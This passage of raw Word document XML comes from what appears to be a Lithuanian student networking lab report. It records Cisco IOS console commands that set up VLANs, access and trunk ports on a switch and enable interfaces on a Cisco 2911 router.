      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Switch#conf t</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="461779EF" w14:textId="132BF708" w:rsidR="0400AD87" w:rsidRPr="005A5C28" w:rsidRDefault="7FBE1982" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Switch(config)#vlan 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="055C110F" w14:textId="132BF708" w:rsidR="0400AD87" w:rsidRPr="005A5C28" w:rsidRDefault="7FBE1982" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Switch(config-vlan)#name users</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="731A3D03" w14:textId="132BF708" w:rsidR="0400AD87" w:rsidRPr="005A5C28" w:rsidRDefault="7FBE1982" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Switch(config-vlan)#ex</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B2E6781" w14:textId="132BF708" w:rsidR="0400AD87" w:rsidRPr="005A5C28" w:rsidRDefault="7FBE1982" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Switch(config)#vlan 3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26D1FD4F" w14:textId="132BF708" w:rsidR="0400AD87" w:rsidRPr="005A5C28" w:rsidRDefault="7FBE1982" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Switch(config-vlan)#name server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EDAAAAB" w14:textId="132BF708" w:rsidR="0400AD87" w:rsidRPr="005A5C28" w:rsidRDefault="7FBE1982" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Switch(config-vlan)#ex</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AAC9645" w14:textId="132BF708" w:rsidR="0400AD87" w:rsidRPr="005A5C28" w:rsidRDefault="7FBE1982" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Switch(config)#int gig0/2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A5AD159" w14:textId="132BF708" w:rsidR="0400AD87" w:rsidRPr="005A5C28" w:rsidRDefault="7FBE1982" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Switch(config-if)#switchport mode acc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11BFAAEB" w14:textId="77777777" w:rsidR="00D72DCB" w:rsidRPr="005A5C28" w:rsidRDefault="7FBE1982" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Switch(config-if)#switchport mode access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1299D332" w14:textId="5F105CA9" w:rsidR="0400AD87" w:rsidRPr="005A5C28" w:rsidRDefault="7FBE1982" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Switch(config-if)#switchport access vlan 3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="296EBAF2" w14:textId="132BF708" w:rsidR="0400AD87" w:rsidRPr="005A5C28" w:rsidRDefault="7FBE1982" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Switch(config-if)#ex</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09729021" w14:textId="132BF708" w:rsidR="0400AD87" w:rsidRPr="005A5C28" w:rsidRDefault="7FBE1982" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Switch(config)#int range fa0/1-3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="235EAA37" w14:textId="132BF708" w:rsidR="0400AD87" w:rsidRPr="005A5C28" w:rsidRDefault="7FBE1982" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Switch(config-if-range)#switchport mode access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3179DADE" w14:textId="132BF708" w:rsidR="0400AD87" w:rsidRPr="005A5C28" w:rsidRDefault="7FBE1982" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Switch(config-if-range)#switchport access vlan 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52980C09" w14:textId="132BF708" w:rsidR="0400AD87" w:rsidRPr="005A5C28" w:rsidRDefault="7FBE1982" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Switch(config-if-range)#exit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B6E047F" w14:textId="132BF708" w:rsidR="0400AD87" w:rsidRPr="005A5C28" w:rsidRDefault="7FBE1982" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Switch(config)#int gig1/1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CF27139" w14:textId="132BF708" w:rsidR="0400AD87" w:rsidRPr="005A5C28" w:rsidRDefault="7FBE1982" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Switch(config-if)#switchport mode trunk</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4118A2B7" w14:textId="132BF708" w:rsidR="0400AD87" w:rsidRPr="005A5C28" w:rsidRDefault="7FBE1982" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Switch(config-if)#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DBEF81E" w14:textId="132BF708" w:rsidR="0400AD87" w:rsidRPr="005A5C28" w:rsidRDefault="7FBE1982" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Switch(config-if)#switchport trunk allowed vlan 2,3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20904AB4" w14:textId="132BF708" w:rsidR="0400AD87" w:rsidRPr="005A5C28" w:rsidRDefault="7FBE1982" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Switch(config-if)#end</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37226417" w14:textId="132BF708" w:rsidR="0400AD87" w:rsidRPr="005A5C28" w:rsidRDefault="7FBE1982" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Switch#wr mem</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76127894" w14:textId="7CEBA8B0" w:rsidR="18EEACA0" w:rsidRPr="005A5C28" w:rsidRDefault="18EEACA0" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="325CDA3D" w14:textId="132BF708" w:rsidR="0400AD87" w:rsidRPr="005A5C28" w:rsidRDefault="7FBE1982" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Building configuration...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66EDC4C8" w14:textId="132BF708" w:rsidR="0400AD87" w:rsidRPr="005A5C28" w:rsidRDefault="7FBE1982" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>[OK]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="228272D9" w14:textId="0477E4E8" w:rsidR="18EEACA0" w:rsidRPr="005A5C28" w:rsidRDefault="18EEACA0" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="72455CE8" w14:textId="132BF708" w:rsidR="0400AD87" w:rsidRPr="005A5C28" w:rsidRDefault="7FBE1982" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Switch#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CF5BA47" w14:textId="2D89D489" w:rsidR="18EEACA0" w:rsidRPr="005A5C28" w:rsidRDefault="18EEACA0" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6212C72E" w14:textId="52F40D35" w:rsidR="00D72DCB" w:rsidRPr="005A5C28" w:rsidRDefault="7FBE1982" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Konfigūruojame </w:t>
      </w:r>
      <w:r w:rsidR="0B306976" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>maršrutizatorių</w:t>
      </w:r>
      <w:r w:rsidR="0066332E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B35968" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidR="0B306976" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>isco 2911</w:t>
      </w:r>
      <w:r w:rsidR="3ECC7635" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Router0:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="538EFC22" w14:textId="010CC5F4" w:rsidR="0400AD87" w:rsidRPr="005A5C28" w:rsidRDefault="0400AD87" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="72B87814" w14:textId="176D36BB" w:rsidR="0400AD87" w:rsidRPr="005A5C28" w:rsidRDefault="7FBE1982" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Router&gt;enable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="635C728F" w14:textId="132BF708" w:rsidR="0400AD87" w:rsidRPr="005A5C28" w:rsidRDefault="7FBE1982" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Router#configure terminal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B7229E0" w14:textId="0B0B7F15" w:rsidR="18EEACA0" w:rsidRPr="005A5C28" w:rsidRDefault="18EEACA0" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="79EF7D42" w14:textId="279567BC" w:rsidR="0400AD87" w:rsidRPr="005A5C28" w:rsidRDefault="7FBE1982" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Enter configuration commands, one per line.</w:t>
      </w:r>
      <w:r w:rsidR="0066332E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>End with CNTL/Z.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="510D8261" w14:textId="7D074F94" w:rsidR="18EEACA0" w:rsidRPr="005A5C28" w:rsidRDefault="18EEACA0" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2AC3773D" w14:textId="132BF708" w:rsidR="0400AD87" w:rsidRPr="005A5C28" w:rsidRDefault="7FBE1982" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Router(config)#interface GigabitEthernet0/0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="350D8C71" w14:textId="77777777" w:rsidR="00924E65" w:rsidRPr="005A5C28" w:rsidRDefault="7FBE1982" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Router(config-if)#no shutdown</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CA6A3E1" w14:textId="565FD224" w:rsidR="0400AD87" w:rsidRPr="005A5C28" w:rsidRDefault="7FBE1982" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Router(config-if)#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13FBA830" w14:textId="132BF708" w:rsidR="0400AD87" w:rsidRPr="005A5C28" w:rsidRDefault="7FBE1982" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Router(config-if)#exit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C7A4BA5" w14:textId="132BF708" w:rsidR="0400AD87" w:rsidRPr="005A5C28" w:rsidRDefault="7FBE1982" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Router(config)#interface GigabitEthernet0/1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B33D2DD" w14:textId="132BF708" w:rsidR="0400AD87" w:rsidRPr="005A5C28" w:rsidRDefault="7FBE1982" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Router(config-if)#no shutdown</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73941303" w14:textId="132BF708" w:rsidR="0400AD87" w:rsidRPr="005A5C28" w:rsidRDefault="7FBE1982" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Router(config-if)#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="799159C1" w14:textId="132BF708" w:rsidR="0400AD87" w:rsidRPr="005A5C28" w:rsidRDefault="7FBE1982" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Router con0 is now available</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="158A1A67" w14:textId="68706E63" w:rsidR="18EEACA0" w:rsidRPr="005A5C28" w:rsidRDefault="18EEACA0" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C489C27" w14:textId="132BF708" w:rsidR="0400AD87" w:rsidRPr="005A5C28" w:rsidRDefault="7FBE1982" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Press RETURN to get started.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="266DB166" w14:textId="377F1B69" w:rsidR="18EEACA0" w:rsidRPr="005A5C28" w:rsidRDefault="18EEACA0" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6168AEBF" w14:textId="132BF708" w:rsidR="0400AD87" w:rsidRPr="005A5C28" w:rsidRDefault="7FBE1982" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Router&gt;en</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0059B911" w14:textId="132BF708" w:rsidR="0400AD87" w:rsidRPr="005A5C28" w:rsidRDefault="7FBE1982" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Router#conf t</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B9391E0" w14:textId="132BF708" w:rsidR="0400AD87" w:rsidRPr="005A5C28" w:rsidRDefault="7FBE1982" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Router(config)#int gig0/1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70D58A45" w14:textId="132BF708" w:rsidR="0400AD87" w:rsidRPr="005A5C28" w:rsidRDefault="7FBE1982" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Router(config-if)#no shutdown</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B023081" w14:textId="132BF708" w:rsidR="0400AD87" w:rsidRPr="005A5C28" w:rsidRDefault="7FBE1982" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Router(config-if)#ex</w:t>
      </w:r>
